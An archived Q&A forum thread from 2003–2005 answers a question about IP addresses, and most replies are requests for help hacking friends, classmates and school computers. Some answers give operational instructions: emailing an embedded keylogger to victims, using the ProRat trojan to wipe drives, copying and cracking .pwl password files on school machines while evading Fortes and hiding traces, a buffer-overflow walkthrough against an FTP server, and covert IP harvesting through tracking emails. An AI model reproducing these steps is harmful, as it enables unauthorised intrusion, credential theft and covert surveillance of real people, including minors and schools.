[ Home  |  FAQ-Related Q&As  |  General Q&As  |  Answered Questions ]


    Search the Q&A Archives


...mean by IP address. How can a hacker can use this...

<< Back to general questions

Question by qwerty
Submitted on 8/7/2003
Related FAQ: N/A
Rating: Rate this question: Vote
what is mean by IP address. How can a hacker can use this address to hack other computers.


Answer by Juergen
Submitted on 9/2/2003
Rating:  Rate this answer: Vote
IP is short for Internet Protocol. An IP address is the address of a computer which communicates with other computers over a protocol named TCP/IP. It looks like four numbers, each between zero and 255 and separated by dots. The IP address of the White House (www.whitehouse.gov) for example is 217.6.176.17.

On the Internet, when computers exchange data (like your computer and a web server), they need to address each other and they use IP addresses for that. Any computer connected to the Internet can be attacked by a hacker if its IP address is known to the hacker. As to how, there are at least as many ways as there are hackers.

 

Answer by K0TA
Submitted on 11/1/2003
Rating:  Rate this answer: Vote
Also there are many programs that search for IP address's but mostly if you are a Hacker the best way is to use MS DOS with such commands as "ping" and "Netstat" or "NBTSTAT -n". But there are many hackers, and in the world of hacking there are very many diffrent opionions to each qeustion and/or answer provided.

 

Answer by Dean
Submitted on 12/19/2003
Rating:  Rate this answer: Vote
I realy want to hack.

 

Answer by TheMan
Submitted on 1/9/2004
Rating:  Rate this answer: Vote
I would like to know how to block people from seeing my real ip address how can i do this?

 

Answer by little_linux_bastard
Submitted on 1/11/2004
Rating:  Rate this answer: Vote
Ok, IP stands for internet Protocol. Someone can hack into ur computer as easy as a hot knife through butter! Yes that easy, someone who has msdos can type in a command ( which there are commands u will know). Some are delete, open, dis, and other simple commands. Followed after that a person would only have to put your IP address and hit a little button. NAd they would be connected. There are computers that have default passwords that you would need to type in in order to "hack". The default passwords are easy! Admin is an easy password. I hope this helps,
Luke

 

Answer by _gonna_hack_sumone_
Submitted on 1/16/2004
Rating:  Rate this answer: Vote
i dont know how to hack, i wanna hack my friend and play with his cd rom lol, how do i do it?

 

Answer by Squall
Submitted on 2/27/2004
Rating:  Rate this answer: Vote
I really need this dudes IP address. He is causing trouble at school. Do I understand that all I have to do is direct connect with him, and then type Netstat -n in the console? That seems simple enough

 

Answer by Indie
Submitted on 2/27/2004
Rating: Not yet rated Rate this answer: Vote
Im not sure that hacking this "dudes" computer would be the best cause of action, however, go for it, if u really want to.

 

Answer by ahbo
Submitted on 3/14/2004
Rating:  Rate this answer: Vote
can you give me some commands in ms-dos?

 

Answer by Hex
Submitted on 4/5/2004
Rating:  Rate this answer: Vote
Dude you wanna hack? Go to www.astalavista.com and download prorat! all you gotta do is send a file and you get there IP in ICQ hotmail whatever... Then you can open disc drives and format C drive (you dident hear this from me)

 

Answer by Jim
Submitted on 4/10/2004
Rating:  Rate this answer: Vote
ive got this dudes ip addresses because hes been hacking into 2 my own pc and i want 2 teach him a lesson, but when i chuck his ip addie in msdos and type 'open' nothing happens, does this mean i need a software 2 hack into his pc?

 

Answer by Slicka
Submitted on 4/10/2004
Rating: Not yet rated Rate this answer: Vote
Hey Hex, can u teach me about prorat?

 

Answer by just want to experince hacking
Submitted on 4/12/2004
Rating:  Rate this answer: Vote
when u use MS_DOS u type in the IP address then enter and u connect?, is there comp running in a window on ur comp?

 

Answer by Bonez2044
Submitted on 4/13/2004
Rating:  Rate this answer: Vote
I guess what they tryin to say and what i wanna know is what u do when u get the ip....like what steps must u take to get in to the victim computer =P

 

Answer by HACKMASTER
Submitted on 4/13/2004
Rating: Not yet rated Rate this answer: Vote
How do you work prorat. I have the person's ip but it doesn't seem to work. I type it in and i click submit and after like 30 sec. it disconnects.

 

Answer by dotmanjay
Submitted on 4/15/2004
Rating: Not yet rated Rate this answer: Vote
i have a web scanner to get a website
ip and also a brutus force so any time i put the ip on the brutus it take time and at the end of the day i dont get anything.plz tell me what to do(dotmanjay@yahoo.com)

 

Answer by Eveready
Submitted on 4/17/2004
Rating:  Rate this answer: Vote
Guys - don't go deep.

Download a keylogger - I would recommend go to "www.blazingtools.com" and download perfect keylogger. Using its remote installation you can embaade it to anything word file, pics, small .exe, I mean anything.  E-mail it to your victim, they double click it, and wallah.

Do remeber to complete the settings section in the options tab, the keylogger will send the logs through SMTP mail server or FTP, whatever you deem fit.

I have cracked professionally as well as personally many dopes.

 

Answer by Benz
Submitted on 4/17/2004
Rating: Not yet rated Rate this answer: Vote
If u need help getting someones IP address go to originalicons.com then go to aim tricks and there should b something there that should help you.

 

Answer by Neophyte
Submitted on 4/20/2004
Rating: Not yet rated Rate this answer: Vote
Uh...if you want to learn how to hack, you should go to a hacking-related site, such as www.hackers.com, www.brain-hack.com, and others (search with google)....

 

Answer by IP
Submitted on 4/23/2004
Rating: Not yet rated Rate this answer: Vote
i have the bob but i don't know what to do with it , how do i hack using ms_dos?

 

Answer by Who cares?
Submitted on 4/24/2004
Rating: Not yet rated Rate this answer: Vote
Hey i know how to hack

 

Answer by Hash
Submitted on 4/28/2004
Rating: Not yet rated Rate this answer: Vote
err, ProRat is not hacking... ProRat is a Trojan aka Backdoor or a RAT (Remote Administaor Tool)... Hacking is way different compare to a Trojan.. search google and see the differents :D

 

Answer by Raj
Submitted on 4/29/2004
Rating: Not yet rated Rate this answer: Vote
What software can I download to stop someone getting my IP add?? how would i go about hacking into someones hotmail account? Also where can i get free antivirus software from (not a Trial)?? (rajveer31@hotmail.com)
     Please tell me!!
           Thanx!!  

 

Answer by AnimalCracker
Submitted on 5/1/2004
Rating: Not yet rated Rate this answer: Vote
hey. i got the prorat program, but when i try and connect it doesnt work. Does anyone know what i may have to do. thanks

 

Answer by hackers
Submitted on 5/2/2004
Rating:  Rate this answer: Vote
dude get sub 7 its the best

 

Answer by phil_i_wanna_hack
Submitted on 5/2/2004
Rating: Not yet rated Rate this answer: Vote
hi, i wud really like to hack, i have just been keylogged and i lost everything i had earnt for the past 4 years on an online game called runescape.  i have his i.p, however i'mnot sure how to use it to keylog him so i can get my stuff back, please may someone give me an easy step-by-step tutorial on how to keylog them through msdos, from phil.

 

Answer by Filipino
Submitted on 5/6/2004
Rating:  Rate this answer: Vote
How can you see the persnos'sIP??

 

Answer by Filipino
Submitted on 5/6/2004
Rating:  Rate this answer: Vote
How can I see someone's IP address??

 

Answer by gayatri
Submitted on 5/8/2004
Rating: Not yet rated Rate this answer: Vote
i want to see the answers

 

Answer by Adam
Submitted on 6/3/2004
Rating: Not yet rated Rate this answer: Vote
Hi everyone i would like to now some commands on the command prompt for windows 200/millenium/XP can you please help?  oh yeah and i would like to know how to get into someones computer using the COMMAND prompt.

Adam
Luke you seem to know what your doing please help??? anyone i need help please (AdamMartello@hotmail.com

 

Answer by Smokey
Submitted on 6/4/2004
Rating: Not yet rated Rate this answer: Vote
I cannot get perfect keylogger to embaade into anything, can you explain to me how or tell me a different keylogger that i can put onto word files.

 

Answer by Mr Dall
Submitted on 6/7/2004
Rating: Not yet rated Rate this answer: Vote
GOOGLE IT!!!

 

Answer by Zelda7fanatic
Submitted on 6/9/2004
Rating: Not yet rated Rate this answer: Vote
OMFG! my friend is being the most annoying person ever! hes on my AIM and screwing everything uP! I'm goign to show him a lesson! tell me how! i cant make a direct connection..
just tell me how to teach him a lesson
!

 

Answer by STeeL
Submitted on 6/10/2004
Rating: Not yet rated Rate this answer: Vote
Wow..this is weird.  I found this site that tracks and gives info on IP addresses.  ( http://www.psacake.com/web/eg.asp ) ..I have a feeling that it's totally bogus, though. I tried some IP's but they were totally off..sometimes not even in the same country. (8D)

 

Answer by kim112
Submitted on 6/15/2004
Rating: Not yet rated Rate this answer: Vote
does anyone want me 2 hack into theirs friends computer n how u use remote admin fully

 

Answer by tundo
Submitted on 6/15/2004
Rating: Not yet rated Rate this answer: Vote
so if you use the ip address an get into there computer is there any way to look at the contents of there computer or is it just being able to mess with there stuff

 

Answer by Me baby Me
Submitted on 6/16/2004
Rating: Not yet rated Rate this answer: Vote
I want to hack but I have no clue on how to AT ALL....any help?

 

Answer by alex
Submitted on 6/17/2004
Rating: Not yet rated Rate this answer: Vote
where is ms_dos i can't find it

 

Answer by Dave
Submitted on 6/18/2004
Rating: Not yet rated Rate this answer: Vote
Dose anyone know how to hack with cammand prompt.Step by step?


Please help

 

Answer by newkid
Submitted on 6/21/2004
Rating: Not yet rated Rate this answer: Vote
Hey im just learning how to use linux and i want to get the full benifit of commands. where  do i go to get some basic commands.

 

Answer by newkid
Submitted on 6/21/2004
Rating:  Rate this answer: Vote
Hey im just learning how to use linux and i want to get the full benifit of commands. where  do i go to get some basic commands.

 

Answer by high6
Submitted on 6/22/2004
Rating:  Rate this answer: Vote
This is basic steps to hack into school district servers, I warn you getting caught is very easy if caught you will be put in jail other then that screw around with server.

We have all been there, on a public school computer that is very limited
because the administrators at the school are filled with the idea that they
have the right to limit our access to the computer. Well today, I will show
you how to get around these so called security measures that they have. Now,
Since there are a wide variety of different kinds of security software in
place all over schools across the world. I will go with the most widely used
and most common kind of attacks available.


[Short Introduction]
You know when there is an administrator account on the computer when a login
prompt comes up when you start up the computer. This tutorial shows the quest
for administrator. The entire goal of this tutorial is to learn how to get
administrator rights with full access. If a login prompts comes up when
windows starts up and it's a Windows 9.x based computer, just hit the ESC
button and you will be booted into a normal windows desktop. From here you can
do what follows in the next sections. Now, you must realize that Windows 9.x
and Windows 2000/NT computers are VERY different. Windows 9.x is super easy to
crack while Windows 2000/NT is much more of a challenge, but of course doable.
So we will start out with Windows 9.x based computers.

Windows 9.x (95,98,ME):
This section covers any Windows 9.x based system. These make up the majority
of the school's computers thanks to the monopoly that is Microsoft. Now,
Windows as you should already know was designed with the worst security in the
world. I will discuss first on how to break these computers in order from
easiest to hardest.

First required reading is the Cracking Passwords section which EVERYONE must
read first. Then if you know if you have security software installed then you can skip
to the section of which has your security software described.



[Cracking Passwords]
If there is no security software in place then it's playtime kids!!! OK, first
thing you do is go open up a DOS prompt by going to "Start", "run" and typing
in "command" without the quotes. Once you you got a DOS prompt. Type "cd"
without the quotes again. And then after that type "cd windows", yet again
without the quotes. Now DOS should display something similar to "C:/windows>".
Right? Now once it does you will insert a floppy disk into the computer. Make
sure this is YOURS!! (lol) And then you will type in the following command
into DOS (WITHOUT the quotes again): "copy *.pwl a:/"
The command above tells the computer to copy all .pwl files located in
c:/windows/system to the a:/ drive which is your floppy disk. This should take
a mere 5-10 seconds, even on slow computers. Then once it's done type in
"exit" (without the quotes) and then DOS will dissappear and all you have to
do is pop out your disk and walk away slowly. :)

Now let me explain why we did the above. Most computers at school are
networked of course. Right? And there is always the administrator. The
administrator is the account that grants unlimited access on a computer. You
don't have administrator because the people don't like you having
Administrator. But, the problem with Windows 9.x computers is that Windows
stores all the passwords in .pwl files in the c:/windows/ folder. Of course
they did take SOME security precautions by using Encryption, which means the
password is not understandable and looks like gibberish. But we copied all
.pwl files to the floppy drive via the "copy *.pwl a:/" command, which means
we saved all the .pwl files to a floppy. INCLUDING administrator and all other
accounts made on the computer. Now it's not much use to you if it is encrypted
right? That is why you must crack it. There are multiple programs out there
that can handle and crack .pwl files. One of my favorites is Cain. Cain can be
downloaded at this web site by clicking HERE. CAIN is very easy to use and has
a good attack scheme. What it does is take any .pwl file and cracks it first
by using a pre built in dictionary and then if it didn't find the right
password to it, it goes to brute force it. Brute forcing means to try every
single possible combinations of letters, numbers and characters on the
keyboard until it finally finds the right password. Keep in mind if it didn't find a password
in it's dictionary, it will move on to bruteforce, around 5 characters or so it will take
a really long time. So beware, it takes time. (Tip: The name of the .pwl file for administrator is
adminst.pwl on most computers, but the username is always Administrator , I do
not know why windows abbreviates it.)

Once you have cracked administrator, then you could always log on using
administrator and have FULL access to the computer to do/install anything you
want. Now i'm going to move on to computers that have security software
installed.



[Cracking computers with Fortes Installed]


Fortes is a very good program that does it's job well. But unfortuantely it is
disabled rather too easily. So we will begin. Make sure you get into a windows
sesson. (I.E, a desktop of some kind) Now, lets just SAY that security was set
on FULL and you have MINIMAL allowed activites. (tip: if you see that you can
still see the "RUN" icon in the Start Menu, then just read the section above
as it will still count even with fortes installed) So lets say you are only
limited to word processing and saving to a floppy, no hard drive saving, no
nothing. Easily bypassed. :) First thing is you run the word processor. This
can be wordpad, Microsoft Word, Corel WordPerfect. Anything. Just run the word
processor. Once you run it you must click the open button which us located
under the "FILE" menu in the word processor. Now surf on over to the
C:/windows/ folder. Once you get there, look for a program named
"command.com". (tip: make sure in the open dialog box that ALL FILES is
selected from the list , that way it will display all file types.) Command.com
is the file that opens up a DOS prompt. A very important file at that. Once
you have found command.com in the open dialog box, right click on it and then
select "COPY". Once you have done that go to your desktop (wallpaper area) and
then hit your right mouse button again, and then click "PASTE". Once you have
done that you must run command.com by double clicking it. Once you have it
opened it immediatly insert your floppy disk (if you haven't already done so)
and then type in the command: "copy c:/windows/*.pwl a:/" (again without the
quotes) and wait as it copies all the .pwl files in the C:/windows/ folder to
your floppy. Now once it is done type in "EXIT" into the dos prompt. And eject
your floppy disk and take it. One more thing to do and your home free. You
copied the command.com file onto the desktop and of course Fortes doesn't
allow you to delete anything. So what to do?! Easy, just right click the
wallpaper and hit "UNDO" and it dissappears. (tip: for faster deletion of the
file, hit CTRL+Z which is the same as hitting the undo button) Why hit Undo?
Because Windows keeps memory of what it last did, so if you tell it to UNDO
the last action performed in windows, that action is the copy of command.com
from c:/windows to c:/windows/desktop/ , and of course fortes allows windows
to undo it, therefore not leaving any trace of any command.com. So the entire
process was done without anyone to have any reason to get suspicious. And just
get up and walk away smiling knowing that you are going to go home and crack
those .pwl files with Cain in a matter of minutes if at most 1 hour.

Please also note that this also works for other programs as well and is NOT
limited to just command.com. For example, your bored and the administrator has
banned the games with Fortes. Easily done by using the word processor's OPEN
dialog to copy it and paste it into the desktop and then before leaving
hitting the undo button to delete it from the desktop. (note: NEVER perform
another windows action, such as copying a file from a floppy etc. etc. as this
will mess up your undo to escape from getting caught.)
real anwser by: xxx not porn

for more help hacking goto
http://www.faqs.org/qa/qa-13492.html

 

Answer by sandhu
Submitted on 6/22/2004
Rating: Not yet rated Rate this answer: Vote
how do u hack i need good adreses
and if anyone wants to know how to get someones ip adres through hotmail the its (! IP) without the space
and makesure they type it in to see theres

 

Answer by harry_jeremy
Submitted on 6/25/2004
Rating: Not yet rated Rate this answer: Vote
Enough Guys,
            I am fed up of all your solutions and programs. Please explain me a safe and easy way of obtaining someones IP address.

 

Answer by .. well question... by me
Submitted on 6/25/2004
Rating: Not yet rated Rate this answer: Vote
With a keylogger, are you saying that if they open the email,  can just access all of there files from my home computer?!

 

Answer by vadim
Submitted on 6/25/2004
Rating: Not yet rated Rate this answer: Vote
go to www.hackology.com/programs/mbhttpbf/ginfo.shtml its good tools and search hacking on www.warez.com

 

Answer by Alice
Submitted on 6/26/2004
Rating:  Rate this answer: Vote
An easy way to get a persons IP address...I have two of the easyest ways...One way uses aim and the other uses their email address...

For the first way you and the person have to have aol instand messenger. "AIM" What you do is Go to http://www.originalicons.com/ and on the left there is a menu. The first choice is Start here..run your mouse over that option...a list pops down. A the bottom of the list therd from bottom it has a link Called "Cool AIM Tricks" click on that. 10th down on the list it sais "figuring out person's IP Address by having them view a picture" Click on that...Eneter your e-mail address and click...Copy to clipboard. Then open AIM and click on the person's sn that you want to get the Ip of. And in the box where your text goes...just right click and choose paste..If you cant right click hit  "ctrl&v" And send the IM. Check your a-mail and you will have an email that sais you got a IP. open it and there is the persons ip address........


Another way you only need a email address and their email...This uses a nice little program no instaling needed...What the program is supposed to be used for is seeing when a person reads your email...^_^ but it has other reasons i guess...Once you are at that web site there is a square with this orange shape that sais click here free trial...The shapes are right above the lady ^_^ Click on the link...Enter all is sais...And select "Free 10 Messages/Month $0.00/1 Month" For a free verision of the web site..It works just the same ^_^ so once you enter everything Click submit..Look at the pictures shown to explane how to use the program. Its simple...Just say the persons email is "aliceland@myway.com" You add ".didtheyreadit.com...so if you wanted to send an email to aliceland@myway.com it would be "aliceland@myway.com.didtheyreadit.com" okay? The person you are sending ther email to is the person you are trying to get the IP of. Send them an email with the .didtheyreadit.com at the end of there email address...once they open the email you will receve an email from didtheyreadit.com Open it...In the little chart thing under the section "Tracking Details" Look at the sub-section that sais "Opened On:" at the end of all of that crap that may say something like c-67-167-63-240.client.comcast.net just for an example..in parenthies these things->(sp?)<-it will have the persons. IP address....

Those are my two ways...

 

Answer by Alias Neo
Submitted on 6/28/2004
Rating: Not yet rated Rate this answer: Vote
right a very easy way to get an i.p addy is to, open a Instant messenger window (mainly MSN) then start chatting to them. Open command prompt "start, run CMD" then what u do is send you friend an image or some kind of file, or invite them to see yuor cam right, then as they click ok cancel then type into command prompt "netstat -n" tehn it will come up wit a load of i.p addy's the 1 u want is the 1 tht says "close_wait" thats the easiest way to get an i.p addy from your mate. to get them scared when u have there i.p tell them to go to www.whatismyip.com then say tht its "what ever thjere i.p is" then they get scared. If your really into messing up someones computer then shout "I WNA BE A HACKER!!!" on here then i will personally give u tips to destroy ur school comps and ur friends comps ok
tis easy write back
yours faithfully
Alias Neo

 

Answer by Alias Neo
Submitted on 6/28/2004
Rating: Not yet rated Rate this answer: Vote
right a very easy way to get an i.p addy is to, open a Instant messenger window (mainly MSN) then start chatting to them. Open command prompt "start, run CMD" then what u do is send you friend an image or some kind of file, or invite them to see yuor cam right, then as they click ok cancel then type into command prompt "netstat -n" tehn it will come up wit a load of i.p addy's the 1 u want is the 1 tht says "close_wait" thats the easiest way to get an i.p addy from your mate. to get them scared when u have there i.p tell them to go to www.whatismyip.com then say tht its "what ever thjere i.p is" then they get scared. If your really into messing up someones computer then shout "I WNA BE A HACKER!!!" on here then i will personally give u tips to destroy ur school comps and ur friends comps ok
tis easy write back
yours faithfully
Alias Neo

 

Answer by repeat_offender
Submitted on 6/30/2004
Rating: Not yet rated Rate this answer: Vote
I WANNA KNOW HOW TO HACK.  I KNOW HOW TO GET IP ADDRESSES, BUT I DON'T KNOW WHAT TO DO AFTER THAT.

 

Answer by umoruko
Submitted on 7/1/2004
Rating: Not yet rated Rate this answer: Vote
hey i want to know how to hack online games and such the an easy way with out searching the entire memory for hours.

 

Answer by Zero- Cool
Submitted on 7/11/2004
Rating: Not yet rated Rate this answer: Vote
I have a question for when you go Start then click "run" what cammand do you put in to start it all I put it CMD and it said that it could not be found. I have printed the instuctions on how to get the IP code from email and all but i dont know the cammands to put in when you get into the "Run"
Please help me.

 

Answer by zero-cool
Submitted on 7/11/2004
Rating: Not yet rated Rate this answer: Vote
if i get the Ip adress what do i put in the Ms-Dos prompt to get into there computer please tell me how to do so.. and the commands to do it.

 

Answer by GhosT
Submitted on 7/14/2004
Rating:  Rate this answer: Vote
lol, Trust Me, Hacking Gets Old And Boring After You Have Been Doin It For A While

 

Answer by Ava
Submitted on 7/15/2004
Rating: Not yet rated Rate this answer: Vote
Does anyone know where I can get a simple keylogging program that I can send to someone and have everything that person types sent to my e-mail adress? Thanks.

 

Answer by Ava
Submitted on 7/15/2004
Rating: Not yet rated Rate this answer: Vote
In addition to my last post, don't give me some super-confusing program that takes a million steps to use and makes no sense. I want SIMPLE!

 

Answer by repeat offender
Submitted on 7/16/2004
Rating: Not yet rated Rate this answer: Vote
well ghost, for those of us that haven't been doing it for a while, help us out.

 

Answer by BArrOOjA
Submitted on 7/18/2004
Rating:  Rate this answer: Vote
Hacking isn't something cool or something you should be messing with, you do it to learn, all you losers who wanna scare their friends.... your stupid, you'll get caught and then get in trouble take it from me don't bother

 

Answer by Raul364
Submitted on 7/20/2004
Rating:  Rate this answer: Vote
1:1 DoS attacks /overflow/buffer overflows, and how to benefit from them.
One of the most common attacks on the net today are so called - D.o.S attacks, "Denial of Service". DoS attacks are usually used in order to prevent systems from doing their job, filling a network with "crap traffic" to hinder legitimate network traffic. Alot of people think that DoS attacks require high speed internet connections in order to perform them, not true. A person with a slow modem and outdated equipment could disable a modern day system with fast connection. The people that make use of "intelligent dos attacks", often use them to benefit somehow from the damage they cause.

DoS attacks are often used in order to find overflow vulnerabilites. Let me show to you a good example of why and how you can make use of overflow vulnerabilities. I will use a outdated bug found in GUILT Microsoft FTP Service (Version 4.0) part of IIS 4. We're doing this local, so it would equal trying to exploit your own system, just to try. Usually you use the character "A" when doing "overflows", I will explain why later. On to the example:

- We are now connected to a computer running Microsoft FTP Service (Version 4.0).
- We do some commands below

ftp: ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

ftp: Connection lost.

If you have no knowledge whatsoever about overflow/dos exploits, you're probably asking yourself, what the hell does that mean? In short, the command "ls", is used in command line ftp clients, and is short for "list", which is the same thing as "dir", or show files. We just sent the command ls followed by a large chunk of data, 316 chars to be precise, and after we done this we lost the connection, why? Simple, the ftp server got overflowed (crashed).

How can this be of any use to us? It's not fun just crashing a server, well it might be but we want to benefit from this and do something more! I am going to explain how in theory this works. Basically you can project 'code' into the memory, and this can be achieved by overflowing the application you're exploiting, by doing this you could put any code into the memory, and make the application execute the code. Imagine you send a chunk of code remotely to someone using icq for example, this code goes into the memory of the target computer and icq executes it. You trick icq into executing this code, you could say the code will work like a function of icq, only it does exactly what you tell it todo. Let's continue:

When the server crashed we got an error message like this on the same machine the server was running on:

"Application Error" pointing to inetinfo.exe , "The instruction at '0x00000000' referenced memory at '0x41414156'

More confusion I take it, 0x00000000 is a memory adress,  I changed the original data, but it was a legit memory adress before I exchanged the original adress and replaced it with zeroes. So what can we do with this? A proper overflow bug could let us execute something called shellcode during runtime of the application we're exploiting, I will get to this later, read on. Let's look at the other memory string we got, "0x41414156", the number 41 is the same as the character "A", it's the hexcode that represents char "A", so we know that we have overwritten memory with our large chunk of data which we used to overflow the server, and that's why it's common to use the character "A" when performing this type of attack.

You have probably seen similar messages when some of your applications crashes. If you have Visual Studio or, visual c++, the error message will ask if you wish to debug the application that crashed. Note that you can debug any application if you have Borland C, visual c++ or another type of compiler that is capable of debugging, there are also single debuggers available. I choose to take a look at the debugger, it will spit out some memory registers like those below:

EAX = 0000005C   EBX =  00000001
ECX = 00D3F978   EDX =  002582DD
ESI  = 00D3F978   EDI  =  00000000
EIP  = 710F8AA2   ESP = 00D3F644
EBP = 00D3F9F0 EFL = 00000206

Don't panic, it's not as giberish as it might seem! You might wonder, where are we going with this? I will just explain the simple principles.

The 3 letter "words" above are assembler, but let's just focus on one of them right now. The one called "EIP". eip stands for "extended instruction pointer". If we could somehow overwrite the EIP with "A"-data, we could possibly use this to execute mean code in the memory. Please bare with me, I write this on a need to know basis, because this might be alot for you to grasp at once, so I will not go deeper into assembler or memory stuff at this time. Let's just focus on what you need to know. Logically if we want to overwrite "more" memory, like the EIP for example we would have to send a bigger amount of data. Let's try that:

ftp: ls AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

ftp: Connection lost.

Okay we lost the connection again, good...it means the server crashed again :) Keep in mind that 41 (hex) = "A",  Let's now look at the registers:

EAX = 0000005C   EBX =  41414141
ECX = 41414141   EDX =  002582DD
ESI  = 41414141   EDI  =  41414141
EIP  = 710F8AA2  ESP = 00D3F644
EBP = 00D3F9F0 EFL = 00000206

Notice that we got more 41's in there now? Good, that means we have successfully overwritten more memory, now if you could manage to overwrite the EIP and get the (RET), "return adress" you could use that to inject code during runtime of an application into the memory and execute it, this code could do anything, execute any file, download a file...practically anything we want, given we got enough memory space to use a code large enough to perform many tasks. This is overcourse though, we need to take it slow, I can't teach you assembler in 2 minutes, nor C - you get the idea, but don't worry, we will get there eventually!

A short summary of this, by using overflow techniques you could find bugs that would let you do almost anything to the victim, by beeing able to inject code into the memory at runtime to execute any evil code you want. Only your skill limits you. Note that this is how alot if not the majority of exploits work. I could go on forever now and ramble about memory structure, the stack, how you're supposed to use the return adress which eip points at, but unfortunately this requires that you know some assembler/c, and this tutorial assumes you have no knowledge of these things yet, I am just preparing you for what's to come, for now :) , keep reading...

1:2 Shellcode
You've probably heard this word a couple of times. Shellcode is basically a list of instructions that can be inserted into an application during runtime. Inserting shellcode into an application can be done through many bugs, but amongst the common ones are what we just discussed, "buffer overflows". There are some great tutorials out there on this, but they're fairly advanced, and I can make it a bit easier for you.

We take a look at a piece of shellcode, that way you will be able to recognize shellcodes in the future, or when looking at sourcecode of exploits. Okay here is a piece of shellcode:
----------------------------------------------------------CODE_START----------------------------------------------------------------
\x55\x89\xe5\x57\x56\x53\xe8\x00\x00\x00\x00\x5b\x83\xc3\xf5\x8d\xb3\x50\x00\x00\x00\xfc\x8d\x7d\xd8\xb9\x03\x00\x00\x00\xf3\xa5\x66\xa5\x83\xe4\xf0\xbf\x01\x00\x00\x00\x8d\x4d\xd8\xba\x0e\x00\x00\x00\xb8\x04\x00\x00\x00\x53\x89\xfb\xcd\x80\x5b\x89\xf8\x53\xbb\x00\x00\x00\x00\xcd\x80\x5b\x8d\x65\xf4\x5b\x5e\x5f\xc9\xc3\x48\x65\x6c\x6c\x6f\x20\x77\x6f\x72\x6c\x64\x21\x0a\x00
----------------------------------------------------------CODE_END-------------------------------------------------------------------
This code could be inserted into the memory, and executed. This code only does the "Hello world" message thing, but all shellcodes looks similar to this one, bigger or smaller.

You might also ask yourself how to write shellcode, there are a few ways. For example there are c>shellcode generators, also assembler>shellcode generators.


1:3 Packetsniffing
Remember in the last document I spoke about how to exploit a bug in a service by using the service against itself. Packetsniffing can be very useful when trying something like that, you can monitor TCP/IP or UDP sessions, and if they're not using encrypted communication you can have a peek at what they are saying to eachother :). You could easily test this on your own machine, just install the server/service you want to exploit, use the client, load up a packetsniffer and look at the communication, see if you find anything useful in there. There are several good packetsniffers out there, both *nix / Win32, just use google, and you will come up with a bunch. One I have used occasionally is Iris by eEye Digital Security - http://www.eeye.com/html/Products/Iris/index.html

1:4 Vulnerability scanners.
There are several applications that will scan a <host> computer, and look for possible vulnerabilities in the system. This is very good if you want to check yourself for example. Personally I don't really bother to use those, because it's funnier to find new bugs, and exploit those than finding old ones. But like I said, it is very useful to have, and if you want to hack a specific computer this could be a step one to check it out, see what kind of security you're dealing with. A very good Win32 vuln scanner is Retina by eEye Digital Security - http://www.eeye.com/html/Products/Retina/index.html

1:5 End game.
And so you got some new knowledge to play with! In the next document I will start using examples based on C in *nix environment, so please look into trying out linux if you havent already. Alot of people recommend Redhat to start with, I just think it sucks, and I recommend Slackware for a start. It's fairly simple to handle, and it gives a good beginners view. You can config/play with it a whole lot. Remember, you don't have to sit in front of a console in linux, pitching commands to the shell, no you can make it look like windows using X windows, I might write a tutorial on that, the point is the c code I will use will not work in windows, that's why i encourage you to try out linux, it might seem hard in the beginning, but it's not that bad really, once you get a hang of it. There are several good starter books to read, anyway I will keep talking about Win32 stuff, also making "some" Win32 code just so all you guys out there that can't be arsed to learn linux will have some use of these tutorials :) - over & out!

IF YOU FOUND ANY OF THIS USEFULL I HAVE LOTS MORE STUFF I CUD SNED U EMAIL ME IF YOU WANT THIS KNOWLEDGE AT ADAMDEAN@Gmail.com

 

Answer by Akuma
Submitted on 7/22/2004
Rating: Not yet rated Rate this answer: Vote
i need help with some chatroom codes...i have a code to freeze ppl'swebpages but....they filtered it...i wonder if someone could help me out with a few codes to drive away the idiots..


thx for any help u can lend

 

Answer by Otto
Submitted on 11/15/2004
Rating: Not yet rated Rate this answer: Vote
If anyone knows how to make items on runescape, like lets say a santa hat, or know how to get a santa hat free, i would love to learn and i really need a santa hat

 

Answer by Butts
Submitted on 12/19/2004
Rating: Not yet rated Rate this answer: Vote
bunch of noob hackers

 

Answer by blah
Submitted on 12/29/2004
Rating: Not yet rated Rate this answer: Vote
this person is ruining my life. i have their ip address but have no idea how to hack so here is an ip address
209.30.172

 

Answer by blah
Submitted on 12/29/2004
Rating: Not yet rated Rate this answer: Vote
this person is ruining my life. i have their ip address but have no idea how to hack so here is an ip address
209.30.172

 

Answer by vadim_kent
Submitted on 1/3/2005
Rating: Not yet rated Rate this answer: Vote
i would like to how to hack some one on irc chat servers like how do i get their ips is there a irc sript program that will do that which ever nick u pic or is there any good irc ip scanners/sniffers and where to get them. and how to use irc scanners how they work

 

Answer by Ro
Submitted on 5/30/2005
Rating: Not yet rated Rate this answer: Vote
i have someones IP address and i was just wondering if there is a way that i can find out WHERE they are... i tried that psacake site and it IS BOUGS cause i tried my friends and it was all wrong.

if anyone knows how i can find out where the IP addres is coming from through MS_DOS please let me know. Thanks

 

Answer by please answer me
Submitted on 12/26/2005
Rating: Not yet rated Rate this answer: Vote
how to get someone's IP n how to hack their computer?????
